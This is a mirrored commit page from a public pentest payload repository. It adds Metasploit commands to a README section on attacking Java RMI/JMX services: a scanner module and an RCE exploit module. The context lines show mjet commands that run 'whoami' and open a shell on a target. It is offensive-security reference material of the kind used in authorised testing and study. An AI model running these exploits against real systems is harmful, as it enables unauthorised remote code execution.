mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Update README.md
This commit is contained in:
parent
aca668fcdd
commit
26cc3629ce
1 changed files with 17 additions and 0 deletions
|
@ -64,6 +64,14 @@ $ rmg enum 172.17.0.2 9010
|
|||
[...]
|
||||
```
|
||||
|
||||
Using Metasploit
|
||||
```bash
|
||||
use auxiliary/scanner/misc/java_rmi_server
|
||||
set RHOSTS <IPs>
|
||||
set RPORT <PORT>
|
||||
run
|
||||
```
|
||||
|
||||
## Exploitation
|
||||
|
||||
### RCE using sjet or mjet
|
||||
|
@ -97,6 +105,15 @@ jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami"
|
|||
jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
|
||||
```
|
||||
|
||||
### RCE using Metasploit
|
||||
```bash
|
||||
use exploit/multi/misc/java_rmi_server
|
||||
set RHOSTS <IPs>
|
||||
set RPORT <PORT>
|
||||
# configure also the payload if needed
|
||||
run
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH, 28 April 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
|
||||
|
|
Loading…
Reference in a new issue